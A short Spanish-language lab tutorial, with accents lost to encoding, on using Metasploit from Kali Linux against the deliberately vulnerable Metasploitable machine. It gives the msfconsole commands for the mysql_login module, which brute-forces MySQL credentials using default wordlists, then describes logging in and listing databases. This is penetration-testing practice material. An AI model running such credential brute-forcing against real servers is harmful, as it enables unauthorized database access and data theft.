Atacar Mysql con Metasploit Prctica realizada con la mquina Metasploitable y Kali Linux, en este casp Metasploitable ya viene configurado con vulnerabilidades para llevar a cabo prcticas de penetracin. A continuacin se describirn cules fueron los pasos que se realizaron para llevar a cabo esta prctica. 1. Instalacin de las mquinas virtuales, se debern instalar una mquina virtual para Kali Linux y Metasplotable. 2. Una vez instaladas se deber poder hacer ping desde cada una de las mquinas. 3. En nuestro Kali abrimos una terminal y tecleamos #msfconsole A continuacin ya estaremos en la consola del Metasploit que trae kali integrado. 4. Tecleamos los siguientes comandos # msfconsole msf > search mysql msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options msf auxiliary(mysql_login) > set RHOSTS [IP_Objetivo] msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit framework/data/wordlists/unix_users.txt msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploitframework/ data/wordlists/unix_passwords.txt msf auxiliary(mysql_login) >exploit En donde IP_Objetivo ser la direccin IP de la mquina virtual en la que fue instalado Metasploitable. Una vez puesto el ltimo comando se conectar al host remoto y comenzar a buscar las contraseas en el servidor mysql.
Cuando el escaneo encuentra un usuario y contrasea vlido se mostrar un cono verde en la parte izquierda de la consola.
Una vez encontrado un usuario vlido procederemos a conectar remotamente con la base de datos de la siguiente manera.
Ya dentro de la consola de mysql podemos hacer uso de los comandos de mysql como por ejemplo: Mostrar las bases de datos que se encuentran en mysql. Show databases Hacer uso de una base de datos en especial Use database_name